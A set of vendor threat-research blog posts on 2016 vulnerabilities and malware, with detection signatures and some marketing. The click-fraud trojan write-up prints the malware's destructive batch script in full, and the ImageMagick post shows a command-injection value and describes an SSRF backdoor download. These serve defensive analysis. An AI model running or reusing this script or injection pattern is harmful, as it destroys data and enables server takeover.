Microsoft(CVE-2016-0189) and Adobe(CVE-2016-4117) Zero day (May 12, 2016)

/in /by

Recent zero days discovered in Microsoft scripting engine and Adobe Flash player are being exploited in the wild.

The Microsoft JScript and VBScript engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka “Scripting Engine Memory Corruption Vulnerability” (CVE-2016-0189)

Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors.(CVE-2016-4117)

Dell SonicWALL Threat Research Team have released following signatures to protect their customers

  • SPY 4502: Malformed-File swf.MP.410
  • IPS 11594: Scripting Engine Memory Corruption Vulnerability (MS16-051) 1

Redosdru.V Malware that hides in encrypted DLL files to avoid detection by Firewalls (May 11,2016)

/in /by

The Dell Sonicwall Threats Research team observed reports of a New Malware family named GAV: Redosdru.V actively spreading in the wild. This time attackers used a dropper to download the original Malware that hides in encrypted DLL files to avoid detection by Firewalls.

Infection Cycle:

Md5:

  • 807db66fd414f3eb5e74e10fc4309ae3

The Malware adds the following files to the system:

  • Malware.exe

    • C:Program FilesAppPatchNetsyst96.dll

    • C:Program FilesMicrosoft FduoodFduzjyw.exe

The Trojan adds the following keys to the Windows registry to ensure persistence upon reboot:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

    • Wsejti gzuaqwud=C:Program FilesMicrosoft FduoodFduzjyw.exe

Once the computer is compromised, the malware copies its own files to AppPatch folder.

The Malware tries to download encrypted DLL file from its own C&C server from following domain:

Here is an example of encrypted DLL file:

Command and Control (C&C) Traffic

Redosdru.V performs communication over 9925 and 60321 ports. The malware sends your system information to its own C&C server via following format, here is an example:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Redosdru.V (Trojan)

Microsoft Security Bulletin Coverage (May 10, 2016)

/in /by

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of May 10, 2016. A list of issues reported, along with Dell SonicWALL coverage information are as follows:

MS16-051 Cumulative Security Update for Internet Explorer

  • CVE-2016-0188 Internet Explorer Security Feature Bypass
    There are no known exploits in the wild.
  • CVE-2016-0189 Scripting Engine Memory Corruption Vulnerability
    IPS:11594 ” Scripting Engine Memory Corruption Vulnerability (MS16-051) 1″
  • CVE-2016-0192 Microsoft Browser Memory Corruption Vulnerability
    IPS:11595 ” Microsoft Browser Memory Corruption Vulnerability (MS16-051) 1″
  • CVE-2016-0194 Internet Explorer Information Disclosure Vulnerability
    SPY:4495 ” Malformed-File exe.MP.15 “

MS16-052 Cumulative Security Update for Microsoft Edge

  • CVE-2016-0191 Microsoft Edge Memory Corruption Vulnerability
    IPS: 11596 “Microsoft Edge Memory Corruption Vulnerability (MS16-051) 1”
  • CVE-2016-0192 Microsoft Browser Memory Corruption Vulnerability
    IPS:11595 ” Microsoft Browser Memory Corruption Vulnerability (MS16-051) 1″
  • CVE-2016-0193 Scripting Engine Memory Corruption Vulnerability
    IPS:11597 ” Scripting Engine Memory Corruption Vulnerability (MS16-051) 2″

MS16-053 Cumulative Security Update for JScript and VBScript

  • CVE-2016-0187 Scripting Engine Memory Corruption Vulnerability
    IPS:11598 ” Scripting Engine Memory Corruption Vulnerability (MS16-051) 3″
  • CVE-2016-0189 Scripting Engine Memory Corruption Vulnerability
    IPS:11594 “Scripting Engine Memory Corruption Vulnerability (MS16-051) 1”

MS16-054 Security Update for Microsoft Office

  • CVE-2016-0126 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0140 Microsoft Office Memory Corruption Vulnerability
    SPY: 4335 “Malformed-File xls.MP.52”
  • CVE-2016-0183 Microsoft Office Graphics RCE Vulnerability
    There are no known exploits in the wild.

MS16-055 Security Update for Microsoft Graphics Component

  • CVE-2016-0168 Windows Graphics Component Information Disclosure Vulnerability
    SPY: 4500 “Malformed-File emf.MP.2”
  • CVE-2016-0169 Windows Graphics Component Information Disclosure Vulnerability
    SPY: 4499 “Malformed-File emf.MP.1”
  • CVE-2016-0170 Windows Graphics Component RCE Vulnerability
    SPY: 4499 “Malformed-File emf.MP.1”
  • CVE-2016-0184 Direct3D Use After Free Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0195 Direct3D Use After Free RCE Vulnerability
    This is a local Vulnerability.

MS16-056 Security Update for Windows Journal

  • CVE-2016-0182 Windows Journal Memory Corruption Vulnerability
    This is a local Vulnerability.

MS16-057 Security Update for Windows Shell

  • CVE-2016-0179 Windows Shell Remote Code Execution Vulnerability
    There are no known exploits in the wild.

MS16-058 Security Update for Windows IIS

  • CVE-2016-0152 Windows DLL Loading Remote Code Execution Vulnerability
    There are no known exploits in the wild.

MS16-059 Security Update for Windows Media Center

  • CVE-2016-0185 Windows Media Center Remote Code Execution Vulnerability
    IPS:11593 “Windows Media Center Remote Code Execution (MS16-059)”

MS16-060 Security Update for Windows Kernel

  • CVE-2016-0180 Windows Kernel Elevation of Privilege Vulnerability
    This is a local Vulnerability.

MS16-061 Security Update for Microsoft RPC

  • CVE-2016-0178 RPC Network Data Representation Engine Elevation of Privilege Vulnerability
    SPY:4497 “Malformed-File exe.MP.14”

MS16-062 Security Update for Windows Kernel-Mode Drivers

  • CVE-2016-0171 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0172 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0173 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0174 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0175 Win32k Information Disclosure Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0176 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0196 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0197 Microsoft DirectX Graphics Kernel Subsystem Elevation of Privilege Vulnerability
    There are no known exploits in the wild.

MS16-064 Security Update for Adobe Flash Player

  • CVE-2016-0177 Schannel Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-065 Security Update for .NET Framework

  • CVE-2016-0149 TLS/SSL Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-066 Security Update for Virtual Secure Mode

  • CVE-2016-0181 Hypervisor Code Integrity Security Feature Bypass
    There are no known exploits in the wild.

MS16-067 Security Update for Volume Manager Driver

  • CVE-2016-0190 Remote Desktop Protocol Drive Redirection Information Disclosure Vulnerability
    There are no known exploits in the wild.

ImageTragick: Owning a Web Server Via Simple Upload (May 9, 2016)

/in /by

ImageTragick: Owning a Web Server Via Simple Upload

When it comes to editing, converting or modifying pictures, the first thing that comes into people’s minds is Photoshop, or MS Paint. However, imagine if a website had to resize, crop, blur, rotate or even watermark all pictures uploaded by many users. It becomes extremely difficult to do so manually. One of the most popular tools for image processing used by these web services is ImageMagick.

Lately, there were reports regarding multiple vulnerabilities concerning ImageMagick. Let’s explore some of them in detail.

Basic Setup

In order to understand what is going on, we need the following:

1. Web server -> For this, I setup an Ubuntu server running Apache.

2. ImageMagick -> Since this is the vulnerable toolkit we are trying to test. Here, we will mainly be focusing on the “convert” app. As the name implies, this application can be used to convert an image file from one format to another. It can also resize, crop, etc.

IE:

Convert test.jpg test.png -> This converts a JPEG file into a PNG file

Convert – resize 200×200 test.jpg out.png -> this converts and resizes a JPEG file to a PNG file

3. PHP/PERL/Python -> Since we will be dealing with the process of uploading files to the web server, we need to create server side scripts to process the uploaded files. For this, I have 2 files, an HTML page and a PHP script.

HTML:

PHP:

So We Upload Images?

Although ImageMagick processes images, it can also accept text files. These text files (.SVG and .MVG) contain special instructions which tell ImageMagick what to draw.

The file above tells ImageMagick to draw an ellipse. The edge is black, while the inside is red. In order to get the JPEG equivalent of the above, we simply run the following: Convert elipse.mvg elipse.jpg

And Voila!

The vulnerabilities occur in how ImageMagick processes certain “pseudo protocols”. Let’s explore some of them now.

CVE-2016-3714 – Code execution via insufficient character filter

Because of insufficient character filters, it is possible for an attacker to execute certain commands. Simply calling the ImageMagick’s “convert” tool, can execute unwanted instructions.

Due to insufficient character filters, it is possible to insert commands by calling the “convert” tool from the command line.

convert ‘https://example.com”;ls “-la’ new.png

The above also works if you used a MVG or SVG as follows:

Then in the command line, run:

Convert insufficient.mvg test.png

However, based on my file upload tests, I have yet to make this work. It may be just a local vulnerability. But do not fret. There is more than 1 way to own a server.

CVE-2016-3717 – Local file read

This vulnerability allows a remote attacker to read files within the web server. This is because of how ImageMagick processes the ‘label’ protocol. By including the filename an attacker want’s to view, they can produce an image file containing the file’s contents.

Uploading this file using our test HTML page we get:>/p>

CVE-2016-3715 – File deletion

Once the attacker was able to view the file contents, they need to remove traces of this. One way of doing it is by deleting the image file created by the previous exploit. This is done using the ‘ephemeral’ protocol.

Using the ellipse example earlier, we can delete the generated image file containing /etc/passwd:

CVE-2016-3718 – SSRF

Perhaps the most tragic of all the ImageMagick vulnerabilities right now, is the SSRF (Server Side Request Forgery) vulnerability. This vulnerability allows an attacker to have the web server download remote files.

If it is only allows file downloads, then why is it tragic? The reason is simple. The downloaded file(s) can be backdoor scripts. In 2015, it was reported that pastebin.com, a legitimate site was used to house malicious scripts. Using the “url” protocol, an HTTP GET request can be initiated to download a php backdoor directly from pastebin.com.

After uploading the malicious MVG, we can then go to the downloaded “backdoor.php”

As you can see, the above php script is capable of doing far more than information disclosure or file deletion.

Prevention Methods:

As seen in the above, filename extension checks do not help prevent exploiting the above mentioned vulnerabilities. In fact, as shown, our uploaded files have the .jpg extension.

Some suggest using a policy file to disable the vulnerable ImageMagick coders/protocols. However, if you are sure that you do not need to use MVG and SVG files, then you can simply use the PHP getimagesize() function. If the uploaded file is MVG or SVG (which are essentially text files), this function returns false.

Dell SonicWALL Threat Research Team has researched these vulnerabilities and released the following signatures to protect their customers:

  • IPS11587: ImageMagick Local File Read
  • IPS11584: ImageMagick Remote Code Execution 1
  • IPS11585: ImageMagick Remote Code Execution 2
  • IPS11589: ImageMagick SSRF
  • WAF9023: ImageMagick Local File Read
  • WAF9022: ImageMagick File Deletion
  • WAF9021: ImageMagick Server Side Remote Forgery

Squid Proxy ESI Component Buffer Overflow (May 6,2016)

/in /by

Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web page.

Buffer overflow in Squid allows remote attackers to execute arbitrary code via crafted Edge Side Includes (ESI) responses.(CVE-2016-4054)

ESI is a small markup language for edge level dynamic web content assembly.A stack-based buffer overflow vulnerability exists in the Squid server. The vulnerability is due to an implementation error when the Squid server processes the ESI markup tags.

The vulnerable function is ESIContext::start() . Patch fixes the overflow by checking the size of buffer before copying.

Dell SonicWALL Threat Research Team has researched this vulnerability and released following signature to protect their customers

  • IPS 4902:Server Application Shellcode Exploit 20

Top Reasons to Update to SonicWall SonicOS 6.2.5 for Better Network Protection

/0 Comments/in /by

Like many people, I sometimes pass over or delay software updates, but this one was different. The new SonicOS6.2.5 adds so many critical new features and so much functionality that I updated my SonicWall TZ firewall the moment it was available.

The new SonicOS 6.2.5 also gave me a chance to make more sense out of my network. My wife works from home, so our network carries both business and personal traffic. SonicOS 6.2.5 adds support for SonicWall X-Series switches on the SonicWall TZ300, TZ400, TZ500 and TZ600 next-generation firewalls. So by replacing my old switch with a SonicWall X-Series switch, I now have a secure network that will allow me to expand as I add more technology. Plus, I am confident that both our home and business data is now protected with the same security engine that is used by governments, colleges, hospitals and banks.

Here are a few reasons this update makes sense for any small business:

  1. The TZ firewall does not slow my network down.
  2. I manage everything from the TZ firewall, including the switch and my SonicWall SonicPoint access points
  3. Protection, protection, protection. At the National Retail Federation show in January, I (accurately) predicted 2016 to be the year where businesses will be hit with ransomware attacks. One of the strengths of  SonicWall is how fast it protects me from all new malware (in this case, ransomware). I continue to make backups, but I feel confident that I will not get breached by this particularly insidious type of malware.

And here what is so exciting about this new release for the distributed enterprise:

  1. With GMS, you can centrally manage the entire network infrastructure of a single site (and all distributed remote sites) including firewalls, switches, wireless access points and WAN acceleration devices. Being able to see what is happening on your network and pushing consistent policies to all sites is a compelling reason to upgrade.
  2. Multiple enhancements for more efficient inspection of encrypted traffic (TLS/SSL) with easier troubleshooting, better scalability and enhanced ease of use. Encrypted traffic is on the rise (50% surge according to 2016 SonicWall Security Annual Threat Report). It’s time to up your game and avoid a costly compromise or denial of service.
  3. With SonicOS 6.2.5,  SonicWall firewalls have achieved the prestigious Department of Defense (DoD) certification based on stringent security requirements. If a product with a firmware version is qualified for use by DoD, then it’s a safe (pun-intended) reason to upgrade your products to 6.2.5 now.

There are also additional improvements that anticipate the dynamic malware business. In our recently published Threat Report, we noted a substantial rise in encrypted communication. This is great for your privacy, but it also gives criminals a very easy method to penetrate networks. Most firewalls either do not inspect encrypted sessions or have this feature turned off a big mistake! An easy way to bypass your network’s security is by sending encrypted malware. Encrypted malware is a reality, so be better prepared with this new OS release. With this new release, the improved user interface makes it easier to set up and manage, especially when it comes to excluding inspection on traffic (such as Google searches).

Building a secure network is something that everyone should insist on. With the new SonicOS features I am a little bit closer. The addition of X-Series switch support to the TZ line (and it is only the TZ300, TZ400, TZ500 and TZ600 products at this time), my network is easier to manage, less complex and more secure.

My friend, Sathya Thammanur, product manager for SonicWall TZs, talked in more detail about the new features of SonicOS 6.2.5 in his recent launch blog. If you are looking for more information his comments are a great place to start or you can download our whitepaper: The Distributed Enterprise and the SonicWall TZ – Building a Coordinated Security Perimeter. If you are ready to upgrade your network, give us a call to explain how security does not have to cost you a lot of money or give you a big headache. As the security officer of your small business, your home or your distributed enterprise, SonicWall has a solution to make your life easier.

Download White Paper

We Need to Re-think our Approach to IT Security

/0 Comments/in /by

Despite the dramatic increase in IT security spending over the last decade, we continue to see a similar increase in the number and the cost of IT security breaches. Consider that Gartner estimates that IT security spending will soar from $75 billion-plus in 2015 to $101 billion in 2018. And similar research firm Markets and Markets sees the cybersecurity market hitting $170 billion by 2020.

We have all read about the high profile breaches at Sony, Target and the U.S. Office of Personnel Management, yet few of us realize there are an order of magnitude more breeches that hit less known and smaller companies every day. Forty-two percent of SMBs said they experienced a cyberattack within the past year according to the Ponemon Institute study. And the average cost of a breach according to a study by the same firm is $3.8 million. This represents a 23 percent increase since 2013.

What this means is that despite all the money and effort we have put into improving IT Security, something is not working. Or at least not as well as we all would like.

The obvious reaction to these trends is to remain cautious, to be on alert, to hold back on granting access to internal applications and data that might add the risk of another breach. Curtis Hutcheson, VP and GM of SonicWall Security Solutions discussed the need for a new approach to IT security in his recent blog.

Who, of course, would not react this way? Who could honestly say they aren’t afraid of an attack that would result in lost customers, lost revenue and lost jobs?

But holding back out of fear is not the right answer. Markets are competitive. There is always another company, organization, agency that is ready to take our customers, students, and stakeholders should we slip or fall behind.

Enabling employees, students, and administrators with access to the latest tools and applications is critical to remaining competitive, to innovating, to winning. Saying “No” might make us feel safer in the short run, but it is likely to cause larger systemic issues that make us irrelevant in today’s fast paced world.

At SonicWall Security we believe there is a way to say “Yes.” We believe IT security executives can:

  • Say “Yes” to initiatives that enable innovation and create competitive advantage

AND

  • Say “Yes” and dramatically improve security to keep corporate and organization assets safe from external threats.

We believe it’s time for IT Security leaders to re-think their approach to IT Security, to be bold and open up their own Department of Yes.

And we can help. Our context-aware security solutions share information which allows It Security departments to Govern Every Identity and Inspect Every Packet on the network. These solutions, working together and not in silos, deliver better overall security with less complexity and at lower total cost.Patrick Sweeny recently discussed how we can help you can open your own Department of Yes.

We are committed to helping our customers deliver better overall security and driving innovation and competitive advantage. That is why we have launched a global campaign to help educate customers on how we can help them open their own Department of Yes. We are partnering with a number of large major media partners including RedmondMag, IDG, CSO, NetworkWorld, CNN and CNBC to help drive our message and educate IT Security executives.

Here are examples of the new campaign

Sound Interesting? Learn more by visiting us a SonicWall.com

Edge vs Internet Explorer 11 (May 1, 2016)

/in /by

About an year ago Microsoft announced the plan to retire Internet Explorer. The new browser, Microsoft Edge, is now the default browser in Windows 10. Previously we have published a SonicAlert reporting this change.

Edge has many security improvements. It does not support legacy technologies such as ActiveX and Browser Helper Objects. The new layout engine, EdgeHTML, is a fork of Trident (the layout engine of Internet Explorer) that has removed all legacy code of older versions of Internet Explorer. EdgeHTML is meant to be fully compatible with the WebKit (the layout engine used by Google Chrome).

Does Edge outperform Internet Explorer form a security perspective? We tried to find some clues here.

Since August 2015, Microsoft has released “Cumulative Security Update for Microsoft Edge” each month. Below is the number of total CVEs related to IE 11 and Edge in last 9 months:

Below is the number of critical CVEs related to IE 11 and Edge in last 9 months:

Over past years Microsoft has lost market share in web browser (source:StatCounter) and we think one of the reasons is that Internet Explorer is more prone to vulnerabilities.

Microsoft is taking right direction on improving security in Edge. We hope Microsoft keeps this effort that one day Edge will become a solid and integrated product.

Click-fraud Trojan deletes files and impairs systems (April 29th, 2016)

/in /by

The Dell Sonicwall Threats Research team have discovered a Click-fraud Trojan that also deletes files and attempts to disable parts of the operating system. It appears to be poorly written and did not succeed in its intention to disable the mouse and keyboard on our test system. It is however, able to delete files, kill explorer.exe and shutdown the system.

Infection Cycle:

The Trojan drops the following file and runs it:

  • %USERPROFILE%Local SettingsTemp2.tmpVirusok.bat

Virusok.bat is a Windows batch script:

The script contains the following instructions:

      @shift /0
      @echo off
      taskkill /im /f chrome.exe
      taskkill /im /f ie.exe
      taskkill /im /f firefox.exe
      taskkill /im /f opera.exe
      taskkill /im /f safari.exe
      del C:Program FilesGoogleChromeAppulcationchrome.exe /q
      del C:Program FilesSafarisafari.exe /q
      del C:Program FilesMozilla Firefoxfirefox.exe /q
      del C:Program FilesOperaopera.exe /q
      del C:Program FilesInternet Explorerie.exe /q
      start www.400kg.com
      rundll32 mouse,disable > nul
      rundll32 keyboard,disable > nul
      rundll32 user,disableoemlayer > nul
      reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoulciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f > nul
      taskkill /f /im explorer.exe > nul
      del: *.*/q > nul
      del %WinDir%system32HAL.dll/q > nul
      del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
      del "%SystemRoot%Cursors*.*" >nul
      shutdown -s -t 00 -c error > nul
      del %0

In addition to deleting driver.cab and hal.dll it deletes all files in the current directory that it is being run from as instructed in the batch script above:

      del: *.*/q > nul

The Trojan causes the following DOS window to be displayed on the screen:

As instructed in the batch script it opens Internet Explorer in order to display www.400kg.com as part of its Click-fraud operation:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

      GAV: Reconyc.A_4 (Trojan)

The SonicWall Security Threat Report 2016: Highlighting Trends in Exploit Kits

/0 Comments/in /by

In February, we released our SonicWall Security 2016 Threat Report, and one of its highlights was a discussion on latest techniques and trends in exploit kits (EKs).

EKs have become a key tool for cybercriminals to take over the target machines (via an exploit) and subsequently install a malware of their choice.

For those who have some background in researching EKs, their stages would seem familiar. First, there is a redirection stage. This leads the user to the landing page of the EK (either directly or via infected website). This redirection stage can occur as a result of a URL link in the spam email or Twitter/Facebook feed, advertising banner redirection (malvertising) or simply an IFRAME redirection from an infected website.

Next is the landing stage. Here, the target visits the actual web server where the EK software resides (i.e., the landing page) and the exploit is delivered.

During exploitation, carefully crafted scripts determine the software components installed on victims machines (in order to select an appropriate exploit first). Then the successful targeted exploit is delivered and malware is subsequently installed on target machines.

Some of the stages described above can be shown using Spartan EK discovered by the SonicWall Threat Research team last year.

As you may note in Spartan’s exploit kit delivery technique, the initial Flash file was encrypted, and the actual exploit code resided only in memory and was never written to disk (thus avoiding potential detection by AV software).

EK delivery mechanisms are evolving, and require security vendors to use the latest up-to-date evasion techniques in order to successfully detect and/or prevent the attacks. It is not uncommon for EKs to check for the presence of certain AV software or virtualized environment during exploit stage, and thus abort its execution to prevent exposing itself to security professionals (see example code below).

For example, last year, we observed the Magnitude EK using steganography techniques during the redirection stage to dynamically generate an IFRAME from an encrypted/encoded image file. Such techniques make it more difficult for affected website owner to identify a potential website infection.

In addition, landing page URLs undergo periodic modifications to avoid detection by security vendors. We have observed landing page URL patterns change within 48 hours for certain EKs. Also, landing page’s software component detection techniques have undergone changes as well. Unlike in the past, we have observed EKs that can determine browser/component versions running on target systems without utilizing the JavaScript PluginDetect library.

What are some important conclusions security product designers can draw from the latest trends in EKs? For one, due to all the exploit and malware payload obfuscation trends in the latest exploit delivery techniques of exploit kits, it is now more important to quickly and correctly identify EK landing page access, and stop the exploit delivery immediately at the point of landing page access by the user. Thus, tracking EKs and their latest attack techniques is an important part of any threat research team’s activity.

Download the SonicWall Security Annual Threat Report today.

Download Report